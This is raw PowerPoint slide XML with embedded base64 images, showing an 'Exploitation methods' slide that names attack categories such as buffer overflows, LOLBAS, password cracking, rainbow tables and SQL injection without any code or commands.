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3722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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploitation methods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5575" y="1371600"/>
            <a:ext cx="8836025" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heap and Buffer Overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	“Smashing the Stack for Fun and Profit”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://insecure.org/stf/smashstack.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Living Off the Land (LOLBAS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Built-in commands to systems for enumeration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Password Cracking/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bruteforcing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Guessing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Rainbow Tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Web Application Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Enumeration Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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